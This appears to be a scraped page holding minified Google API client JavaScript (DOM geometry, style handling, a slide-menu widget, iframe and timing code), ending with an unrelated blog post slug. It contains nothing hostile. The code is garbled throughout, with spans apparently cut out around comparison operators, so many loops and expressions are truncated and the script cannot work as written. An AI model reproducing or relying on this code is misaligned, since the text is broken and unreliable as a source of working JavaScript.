0==c.returnValue)c.returnValue=!0}c=[];for(e=b.currentTarget;e;e=e.parentNode)c.push(e);a=a.type;for(e=c.length-1;!b.cm&&0<=e;e--){b.currentTarget=c[e];var f=fq(c[e],a,!0,b);d=d&&f}for(e=0;!b.cm&&e>>0);_.Wp=function(a){if(_.Va(a))return a;a[gq]||(a[gq]=function(b){return a.handleEvent(b)});return a[gq]};_.Li(function(a){cq=a(cq)}); _.hq=function(a){a.PA=void 0;a.Na=function(){return a.PA?a.PA:a.PA=new a}};_.iq=function(a,b){var c=a.length-b.length;return 0<=c&&a.indexOf(b,c)==c};_.jq=function(a){for(var b in a)return!1;return!0};_.kq=function(a,b,c,d,e){if(_.Ma(b))for(var f=0;f=this.left&&a.right<=this.right&&a.top>=this.top&&a.bottom<=this.bottom:a.x>=this.left&&a.x<=this.right&&a.y>=this.top&&a.y<=this.bottom:!1}; _.g.expand=function(a,b,c,d){_.Wa(a)?(this.top-=a.top,this.right+=a.right,this.bottom+=a.bottom,this.left-=a.left):(this.top-=a,this.right+=Number(b),this.bottom+=Number(c),this.left-=Number(d));return this};_.g.ceil=function(){this.top=Math.ceil(this.top);this.right=Math.ceil(this.right);this.bottom=Math.ceil(this.bottom);this.left=Math.ceil(this.left);return this}; _.g.floor=function(){this.top=Math.floor(this.top);this.right=Math.floor(this.right);this.bottom=Math.floor(this.bottom);this.left=Math.floor(this.left);return this};_.g.round=function(){this.top=Math.round(this.top);this.right=Math.round(this.right);this.bottom=Math.round(this.bottom);this.left=Math.round(this.left);return this}; _.g.translate=function(a,b){a instanceof _.Gq?(this.left+=a.x,this.right+=a.x,this.top+=a.y,this.bottom+=a.y):(this.left+=a,this.right+=a,_.Sa(b)&&(this.top+=b,this.bottom+=b));return this};_.g.scale=function(a,b){b=_.Sa(b)?b:a;this.left*=a;this.right*=a;this.top*=b;this.bottom*=b;return this}; var gr,mr,kr,pr,Cr,Dr;_.fr=function(a,b,c){if(_.v(b))(b=_.er(a,b))&&(a.style[b]=c);else for(var d in b){c=a;var e=b[d],f=_.er(c,d);f&&(c.style[f]=e)}};gr={};_.er=function(a,b){var c=gr[b];if(!c){var d=_.Dc(b);c=d;void 0===a.style[d]&&(d=(_.Wb?"Webkit":_.Vb?"Moz":_.D?"ms":_.Qb?"O":null)+Nq(d),void 0!==a.style[d]&&(c=d));gr[b]=c}return c}; _.hr=function(a,b){var c=_.rd(a);return c.defaultView&&c.defaultView.getComputedStyle&&(a=c.defaultView.getComputedStyle(a,null))?a[b]||a.getPropertyValue(b)||"":""};_.ir=function(a,b){return a.currentStyle?a.currentStyle[b]:null};_.jr=function(a,b){return _.hr(a,b)||_.ir(a,b)||a.style&&a.style[b]};_.lr=function(a,b,c){if(b instanceof _.Gq){var d=b.x;b=b.y}else d=b,b=c;a.style.left=kr(d,!1);a.style.top=kr(b,!1)}; mr=function(a){try{var b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom:0}}_.D&&a.ownerDocument.body&&(a=a.ownerDocument,b.left-=a.documentElement.clientLeft+a.body.clientLeft,b.top-=a.documentElement.clientTop+a.body.clientTop);return b}; _.qr=function(a,b){b=b||_.Lq(window.document);var c=b||_.Lq(window.document);var d=_.nr(a),e=_.nr(c),f=_.or(c);if(c==_.Lq(window.document)){var h=d.x-c.scrollLeft;d=d.y-c.scrollTop;_.D&&!_.nc(10)&&(h+=f.left,d+=f.top)}else h=d.x-e.x-f.left,d=d.y-e.y-f.top;a=pr(a);f=c.clientHeight-a.height;e=c.scrollLeft;var k=c.scrollTop;e+=Math.min(h,Math.max(h-(c.clientWidth-a.width),0));k+=Math.min(d,Math.max(d-f,0));c=new _.Gq(e,k);b.scrollLeft=c.x;b.scrollTop=c.y}; _.nr=function(a){var b=_.rd(a),c=new _.Gq(0,0);var d=b?_.rd(b):window.document;d=!_.D||_.nc(9)||_.Iq(_.sd(d).Va)?d.documentElement:d.body;if(a==d)return c;a=mr(a);b=_.Mq(_.sd(b).Va);c.x=a.left+b.x;c.y=a.top+b.y;return c};_.sr=function(a,b){var c=new _.Gq(0,0),d=_.xd(_.rd(a));if(!_.Mb(d,"parent"))return c;do{var e=d==b?_.nr(a):_.rr(a);c.x+=e.x;c.y+=e.y}while(d&&d!=b&&d!=d.parent&&(a=d.frameElement)&&(d=d.parent));return c};_.rr=function(a){a=mr(a);return new _.Gq(a.left,a.top)}; _.tr=function(a,b,c){if(b instanceof _.Hq)c=b.height,b=b.width;else if(void 0==c)throw Error("K");a.style.width=kr(b,!0);a.style.height=kr(c,!0)};kr=function(a,b){"number"==typeof a&&(a=(b?Math.round(a):a)+"px");return a};_.ur=function(a){var b=pr;if("none"!=_.jr(a,"display"))return b(a);var c=a.style,d=c.display,e=c.visibility,f=c.position;c.visibility="hidden";c.position="absolute";c.display="inline";a=b(a);c.display=d;c.position=f;c.visibility=e;return a}; pr=function(a){var b=a.offsetWidth,c=a.offsetHeight,d=_.Wb&&!b&&!c;return _.r(b)&&!d||!a.getBoundingClientRect?new _.Hq(b,c):(a=mr(a),new _.Hq(a.right-a.left,a.bottom-a.top))};_.vr=function(a,b){a=a.style;"opacity"in a?a.opacity=b:"MozOpacity"in a?a.MozOpacity=b:"filter"in a&&(a.filter=""===b?"":"alpha(opacity="+100*Number(b)+")")};_.wr=function(a,b){a.style.display=b?"":"none"}; _.yr=function(a){var b=_.sd(void 0),c=b.mb();if(_.D&&c.createStyleSheet)return b=c.createStyleSheet(),_.xr(b,a),b;c=_.ud(b.Va,"HEAD",void 0,void 0)[0];if(!c){var d=_.ud(b.Va,"BODY",void 0,void 0)[0];c=b.ma("HEAD");d.parentNode.insertBefore(c,d)}d=b.ma("STYLE");_.xr(d,a);b.appendChild(c,d);return d};_.xr=function(a,b){b=_.Wq(b);_.D&&_.r(a.cssText)?a.cssText=b:a.innerHTML=b};_.zr=function(a){return"rtl"==_.jr(a,"direction")};_.Ar=_.Vb?"MozUserSelect":_.Wb||_.Tb?"WebkitUserSelect":null; _.Br=function(a,b){if(/^\d+px?$/.test(b))return(0,window.parseInt)(b,10);var c=a.style.left,d=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;a.style.left=b;b=a.style.pixelLeft;a.style.left=c;a.runtimeStyle.left=d;return+b};Cr={thin:2,medium:4,thick:6};Dr=function(a,b){if("none"==_.ir(a,b+"Style"))return 0;b=_.ir(a,b+"Width");return b in Cr?Cr[b]:_.Br(a,b)}; _.or=function(a){if(_.D&&!_.nc(9)){var b=Dr(a,"borderLeft"),c=Dr(a,"borderRight"),d=Dr(a,"borderTop");a=Dr(a,"borderBottom");return new _.dr(d,c,a,b)}b=_.hr(a,"borderLeftWidth");c=_.hr(a,"borderRightWidth");d=_.hr(a,"borderTopWidth");a=_.hr(a,"borderBottomWidth");return new _.dr((0,window.parseFloat)(d),(0,window.parseFloat)(c),(0,window.parseFloat)(a),(0,window.parseFloat)(b))}; var Er;Er=function(a){return(a=a.exec(_.yb))?a[1]:""};_.Fr=function(){if(_.Cg)return Er(/Firefox\/([0-9.]+)/);if(_.D||_.Tb||_.Qb)return _.kc;if(_.Gg)return _.Kb()?Er(/CriOS\/([0-9.]+)/):Er(/Chrome\/([0-9.]+)/);if(_.Hg&&!_.Kb())return Er(/Version\/([0-9.]+)/);if(_.Dg||_.Eg){var a=/Version\/(\S+).*Mobile\/(\S+)/.exec(_.yb);if(a)return a[1]+"."+a[2]}else if(_.Fg)return(a=Er(/Android\s+([0-9.]+)/))?a:Er(/Version\/([0-9.]+)/);return""}(); _.Gr=function(a,b,c,d){this.left=a;this.top=b;this.width=c;this.height=d};_.g=_.Gr.prototype;_.g.clone=function(){return new _.Gr(this.left,this.top,this.width,this.height)};_.g.QA=_.da(22);_.g.intersects=function(a){return this.left<=a.left+a.width&&a.left<=this.left+this.width&&this.top<=a.top+a.height&&a.top<=this.top+this.height}; _.g.contains=function(a){return a instanceof _.Gq?a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y<=this.top+this.height:this.left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top+a.height};_.g.distance=function(a){var b=a.x+~[\]()=^$|]+$/.test(c))throw Error("h`"+a);a:{for(var d={"(":")","[":"]"},e=[],f=0;fa.clientWidth||a.scrollHeight>a.clientHeight||"fixed"==c||"absolute"==c||"relative"==c))return a;return null}; _.Or=function(a){for(var b=new _.dr(0,window.Infinity,window.Infinity,0),c=_.sd(a),d=c.mb().body,e=c.mb().documentElement,f=_.Lq(c.Va);a=Nr(a);)if(!(_.D&&0==a.clientWidth||_.Wb&&0==a.clientHeight&&a==d)&&a!=d&&a!=e&&"visible"!=_.jr(a,"overflow")){var h=_.nr(a),k=new _.Gq(a.clientLeft,a.clientTop);h.x+=k.x;h.y+=k.y;b.top=Math.max(b.top,h.y);b.right=Math.min(b.right,h.x+a.clientWidth);b.bottom=Math.min(b.bottom,h.y+a.clientHeight);b.left=Math.max(b.left,h.x)}d=f.scrollLeft;f=f.scrollTop;b.left=Math.max(b.left, d);b.top=Math.max(b.top,f);c=_.Kq(c.ub());b.right=Math.min(b.right,d+c.width);b.bottom=Math.min(b.bottom,f+c.height);return 0<=b.top&&0<=b.left&&b.bottom>b.top&&b.right>b.left?b:null};_.Pr=function(a){var b=_.nr(a);a=_.ur(a);return new _.Gr(b.x,b.y,a.width,a.height)};Qr=function(a,b){return(b&8&&_.zr(a)?b^4:b)&-9}; _.Rr=function(a,b,c,d,e,f,h,k,l){var n;if(n=c.offsetParent){var p="HTML"==n.tagName||"BODY"==n.tagName;if(!p||"static"!=_.Hr(n)){var q=_.nr(n);if(!p){p=_.zr(n);var t;if(t=p){t=_.Hg&&0<=_.ub(_.Fr,10);var y=_.ec&&0<=_.ub(_.Ir,10);t=_.Vb||t||y}p=t?-n.scrollLeft:!p||_.Ub&&_.lc("8")||"visible"==_.jr(n,"overflowX")?n.scrollLeft:n.scrollWidth-n.clientWidth-n.scrollLeft;q=Mr(q,new _.Gq(p,n.scrollTop))}}}n=q||new _.Gq;q=_.Pr(a);(p=_.Or(a))&&q.QA(new _.Gr(p.left,p.top,p.right-p.left,p.bottom-p.top));p=_.sd(a); y=_.sd(c);p.mb()!=y.mb()&&(t=p.mb().body,y=_.sr(t,y.ub()),y=Mr(y,_.nr(t)),!_.D||_.nc(9)||_.Iq(p.Va)||(y=Mr(y,_.Mq(p.Va))),q.left+=y.x,q.top+=y.y);a=Qr(a,b);b=q.left;a&4?b+=q.width:a&2&&(b+=q.width/2);b=new _.Gq(b,q.top+(a&1?q.height:0));b=Mr(b,n);e&&(b.x+=(a&4?-1:1)*e.x,b.y+=(a&1?-1:1)*e.y);if(h)if(l)var u=l;else if(u=_.Or(c))u.top-=n.y,u.right-=n.x,u.bottom-=n.y,u.left-=n.x;e=u;l=b.clone();u=Qr(c,d);d=_.ur(c);a=k?k.clone():d.clone();k=l;l=a;k=k.clone();l=l.clone();a=0;if(f||0!=u)u&4?k.x-=l.width+ (f?f.right:0):u&2?k.x-=l.width/2:f&&(k.x+=f.left),u&1?k.y-=l.height+(f?f.bottom:0):f&&(k.y+=f.top);h&&(e?(f=k,u=l,a=0,65==(h&65)&&(f.x=e.right)&&(h&=-2),132==(h&132)&&(f.y=e.bottom)&&(h&=-5),f.xe.right&&(u.width=Math.min(e.right-f.x,b+u.width-e.left),u.width=Math.max(u.width,0),a|=4)),f.x+u.width>e.right&&h&1&&(f.x=Math.max(e.right-u.width,e.left),a|=1),h&2&&(a|=(f.x e.right?32:0)),f.ye.bottom&&(u.height=Math.min(e.bottom-f.y,b+u.height-e.top),u.height=Math.max(u.height,0),a|=8)),f.y+u.height>e.bottom&&h&4&&(f.y=Math.max(e.bottom-u.height,e.top),a|=2),h&8&&(a|=(f.ye.bottom?128:0)),h=a):h=256,a=h);f=new _.Gr(0,0,0,0);f.left=k.x;f.top=k.y;f.width=l.width;f.height=l.height;h=a;h&496||(_.lr(c,new _.Gq(f.left,f.top)),a=f.jn(),d==a||d&&a&&d.width==a.width&& d.height==a.height||(f=a,d=_.Iq(_.sd(_.rd(c)).Va),!_.D||_.lc("10")||d&&_.lc("8")?(c=c.style,_.Vb?c.MozBoxSizing="border-box":_.Wb?c.WebkitBoxSizing="border-box":c.boxSizing="border-box",c.width=Math.max(f.width,0)+"px",c.height=Math.max(f.height,0)+"px"):(k=c.style,d?(d=_.Kr(c,"padding"),c=_.or(c),k.pixelWidth=f.width-c.left-d.left-d.right-c.right,k.pixelHeight=f.height-c.top-d.top-d.bottom-c.bottom):(k.pixelWidth=f.width,k.pixelHeight=f.height))));return h}; var Tr;_.Sr=function(){var a=window,b=a.document,c=0;if(b){c=b.body;var d=b.documentElement;if(!d||!c)return 0;a=_.Jq(a).height;if(_.Iq(b)&&d.scrollHeight)c=d.scrollHeight!=a?d.scrollHeight:d.offsetHeight;else{b=d.scrollHeight;var e=d.offsetHeight;d.clientHeight!=e&&(b=c.scrollHeight,e=c.offsetHeight);c=b>a?b>e?b:e:b=arguments.length?Array.prototype.slice.call(a,b):Array.prototype.slice.call(a,b,c)};_.ys=function(a,b,c,d){return Array.prototype.splice.apply(a,_.xs(arguments,1))};_.zs=function(a){_.vp.call(this);this.eg=a;this.Lb={}};_.B(_.zs,_.vp);var As=[];_.zs.prototype.W=function(a,b,c,d){return this.Tq(a,b,c,d)}; _.zs.prototype.Tq=function(a,b,c,d,e){_.Ma(b)||(b&&(As[0]=b.toString()),b=As);for(var f=0;f":(c=_.Xx(b),h+=">"+_.ld(c)+"",c=c.ql());(a=a&&a.dir)&&(c=/^(ltr|rtl|auto)$/i.test(a)?0:null);return _.md(h,c)};_.Zx=function(a,b){_.Ma(b)||(b=[b]);b=(0,_.mb)(b,function(a){return _.v(a)?a:a.Rv+" "+a.duration+"s "+a.timing+" "+a.delay+"s"});_.fr(a,"transition",b.join(","))}; _.$x=function(a){var b=!1,c;return function(){b||(c=a(),b=!0);return c}}(function(){if(_.D)return _.lc("10.0");var a=_.Cd("DIV"),b=_.Wb?"-webkit":_.Vb?"-moz":_.D?"-ms":_.Qb?"-o":null,c={transition:"opacity 1s linear"};b&&(c[b+"-transition"]="opacity 1s linear");b=_.Yx({style:c});a.innerHTML=_.ld(b);a=a.firstChild;b=a.style[_.Dc("transition")];return""!=("undefined"!==typeof b?b:a.style[_.er(a,"transition")]||"")}); var eF=function(a,b,c,d,e){this.width=a;this.height=b;this.Fm=c;this.Gm=d;this.opacity=e},fF=function(a,b,c,d){return new eF(void 0==b?a.width:b,void 0==c?a.height:c,a.Fm,a.Gm,void 0==d?a.opacity:d)};eF.prototype.equals=function(a){return this.width==a.width&&this.height==a.height&&this.Fm==a.Fm&&this.Gm==a.Gm&&this.opacity==a.opacity}; eF.prototype.interpolate=function(a,b){var c=1-b;return new eF(Math.round(this.width*c+a.width*b),Math.round(this.height*c+a.height*b),Math.round(this.Fm*c+a.Fm*b),Math.round(this.Gm*c+a.Gm*b),this.opacity*c+a.opacity*b)}; _.gF=function(a){_.Vr.call(this,a);this.ua=new _.zs(this)};_.B(_.gF,_.Xr); _.gF.prototype.create=function(){var a=Number(this.Oj(200,"widgetWidth","width")),b=Number(this.Oj(100,"widgetHeight","height")),c=this.Oj("auto","corner"),d=this.Oj({},"menuCss"),e=this.Oj(!0,"hideOnClick");this.Dq=!!this.Oj(!0,"hideOnLeave");this.UD=!!this.Oj((0,_.$x)(),"useCss3Transition");this.sQ=!!this.Oj(!0,"allowOffset");var f=window.document.createElement("div");this.Ba=f;var h=this.vf();h.parentNode.appendChild(f);var k=window.document.createElement("div");this.Em=k;f.appendChild(k);d.position= "absolute";d.width=a+"px";d.height="0";d.border=d.border||"1px solid #aaa";d.background=d.background||"#fff";d.zIndex=_.as(this);d.overflow="hidden";d.boxShadow=d.MozBoxShadow=d.webkitBoxShadow=d.boxShadow||"0 2px 2px rgba(0,0,0,0.3)";_.fr(f,d);_.fr(k,{left:"-1000px",top:"-1000px",position:"absolute",width:a+"px",height:b+"px"});this.G0=f.offsetWidth-a;this.I0=f.offsetHeight;d="auto"==c?["top","start"]:c.split("-");h=_.zr(h);this.$s="bottom"==d[0];this.dw="right"==d[1]||"left"!=d[1]&&h;this.Tg=hF(this, a,b,"auto"==c);this.wD=_.m.setTimeout((0,_.C)(this.D_,this),500);this.ua.W(f,"mouseover",this.EB);this.ua.Tq(f,"mouseout",this.DB,!1,this);e&&_.m.setTimeout((0,_.C)(function(){this.yp||this.ua.W(window.document,"click",this.qX)},this),0)}; _.gF.prototype.open=function(){this.create();this.V.df(this.Ba);this.V.Tc("resize",(0,_.C)(this.resize,this));this.V.ne("showMenu",(0,_.C)(this.gM,this));var a=this.V.methods;a.setHideOnLeave=(0,_.C)(this.Jr,this);a.displayStateCallback&&(this.MG=a.displayStateCallback,delete a.displayStateCallback);this.V.zf(this.Em,{height:"100%"});_.iF(this,this.Tg)};_.gF.prototype.open=_.gF.prototype.open; _.gF.prototype.Qc=function(a){this.yp||(a=a||{},this.Em.style.left="0",this.Em.style.top="0",this.$i&&(_.Hd(this.$i),this.$i=null),this.wD&&(_.m.clearTimeout(this.wD),this.wD=null),jF(this,(0,window.parseInt)(a.width,10)||(0,window.parseInt)(this.V.width,10)||this.Tg.width,(0,window.parseInt)(a.height,10)||(0,window.parseInt)(this.V.height,10)||this.Tg.height))};_.gF.prototype.onready=_.gF.prototype.Qc; _.gF.prototype.resize=function(a){this.yp||jF(this,(0,window.isNaN)(+a.width)?this.Tg.width:+a.width,(0,window.isNaN)(+a.height)?this.Tg.height:+a.height)};_.gF.prototype.close=function(){this.AA?kF(this):(this.hy=!0,lF(this))};_.gF.prototype.close=_.gF.prototype.close;_.gF.prototype.Oj=function(a,b){for(var c,d=1,e=arguments.length;d=f.left;a.dw=a.dw?!d||h:!d&&h;h=e.offsetTop;d=h+c=f.top;a.$s=a.$s?!d||h:!d&&h}d=a.kq(a.dw,e.offsetLeft,e.offsetWidth,b,f.left,f.right);a=a.kq(a.$s,e.offsetTop,e.offsetHeight,c,f.top,f.bottom);return new eF(b,c,d,a,1)}; _.gF.prototype.kq=function(a,b,c,d,e,f){return a?(a=b+c,Math.min(f-a,Math.max(e+d-a,0))):Math.max(e-b,Math.min(f-b-d,0))};var jF=function(a,b,c){a.V.Ha().style.width=b+"px";a.V.Ha().style.height=c+"px";a.Em.style.width=b+"px";a.Em.style.height=c+"px";b=a.sQ?hF(a,b,c,!1):fF(a.vz,b,c);a.Tg=b;a.Zj||mF(a,b)};_.g=_.gF.prototype;_.g.Jr=function(a){this.Dq=!!a};_.g.EB=function(){!this.Zj&&this.Il&&(_.m.clearTimeout(this.Il),this.Il=null)}; _.g.DB=function(a){if(!(this.Zj||this.Il||!this.Dq||a.relatedTarget&&_.Ld(this.Ba,a.relatedTarget))){var b=_.Pr(this.Ba);a=a.clientY>b.top&&a.clientY=c?nF(this,b):(nF(this,a.interpolate(b,1-Math.pow(1-Math.min(1-(c-d)/350,1),3))),this.Pm=_.m.setTimeout((0,_.C)(this.SJ,this,a,b,c),20))}}; _.Q.Yb("slide-menu",function(a){return new _.fs(new _.gF(a))}); _.cm=_.Td(_.de,"rw",_.G()); var dm=function(a,b){(a=_.cm[a])&&a.statetype"]=a;_.Vd(c,b);a=_.Hk(d,h,e);f.iframeNode=a;f.id=a.getAttribute("id")};_.Lm=function(a){_.Td(Hm,a,0);return"___"+a+"_"+Hm[a]++};Jm=function(a){var b=void 0;"number"===typeof a?b=a:"string"===typeof a&&(b=(0,window.parseInt)(a,10));return b}; var Nm=function(){},Qm=function(a){var b=a.Vm,c=function(a){c.H.constructor.call(this,a);var b=this.jh.length;this.Ig=[];for(var d=0;d=e&&(f.ic="1");t=/^#|^fr-/;e={};for(var y in f)_.Ud(f,y)&&t.test(y)&&(e[y.replace(t,"")]=f[y],delete f[y]);y="q"==_.H("iframes/"+a+"/params/si")?f:e;t=_.vm();for(var u in t)!_.Ud(t,u)||_.Ud(f,u)||_.Ud(e,u)||(y[u]=t[u]);u=[].concat(Gm);y=_.H("iframes/"+a+"/methods");_.Tj(y)&&(u=u.concat(y));for(x in c)_.Ud(c,x)&&/^on/.test(x)&&("plus"!=a||"onconnect"!=x)&&(u.push(x),delete f[x]);delete f.callback;e._methods=u.join(",");var x=_.ik(p,f,e);u=h||{};u.allowPost=1;u.attributes= Fm;u.dontclear=!k;h={};h.userParams=c;h.url=x;h.type=a;_.Mm(a,b,c,x,u,h);b=h.id;c=_.G();c.id=b;c.userParams=h.userParams;c.url=h.url;c.type=h.type;c.state=1;_.cm[b]=c;b=h}else b=null;b&&((c=b.id)&&d.push(c),cn(a,b))}},dn=function(a,b,c){if(a&&1===a.nodeType&&b){if(c)return 1;if(Vm[b]){if(pm[a.nodeName.toLowerCase()])return(a=a.innerHTML)&&a.replace(/^[\s\xa0]+|[\s\xa0]+$/g,"")?0:1}else{if(Um[b])return 0;if(Tm[b])return 1}}return null}; _.Td(_.Wd,"platform",{}).go=function(a,b){bn(a,b)};var en=_.Td(_.de,"perf",_.G()),Zm=_.Td(en,"g",_.G()),fn=_.Td(en,"i",_.G()),gn,hn,jn,$m,ln,mn,nn;_.Td(en,"r",[]);gn=_.G();hn=_.G();jn=function(a,b,c,d){gn[c]=gn[c]||!!d;_.Td(hn,c,[]);hn[c].push([a,b])};$m=function(a,b,c){var d=en.r;"function"===typeof d?d(a,b,c):d.push([a,b,c])};ln=function(a,b,c,d){if("_p"==b)throw Error("D");_.kn(a,b,c,d)};_.kn=function(a,b,c,d){mn(b,c)[a]=d||(new Date).getTime();$m(a,b,c)};mn=function(a,b){a=_.Td(fn,a,_.G());return _.Td(a,b,_.G())}; nn=function(a,b,c){var d=null;b&&c&&(d=mn(b,c)[a]);return d||Zm[a]}; (function(){function a(a){this.t={};this.tick=function(a,b,c){this.t[a]=[void 0!=c?c:(new Date).getTime(),b];if(void 0==c)try{window.console.timeStamp("CSI/"+a)}catch(p){}};this.tick("start",null,a)}var b;if(window.performance)var c=(b=window.performance.timing)&&b.responseStart;var d=0=e&&(window.__gapi_jstiming__.srt=c-e)}if(b){var f=window.__gapi_jstiming__.load;0=e&&(f.tick("_wtsrt",void 0,e), f.tick("wtsrt_","_wtsrt",c),f.tick("tbsd_","wtsrt_"))}try{b=null,window.chrome&&window.chrome.csi&&(b=Math.floor(window.chrome.csi().pageT),f&&0
ashtonabbey/help-me-what-does-all-this-mean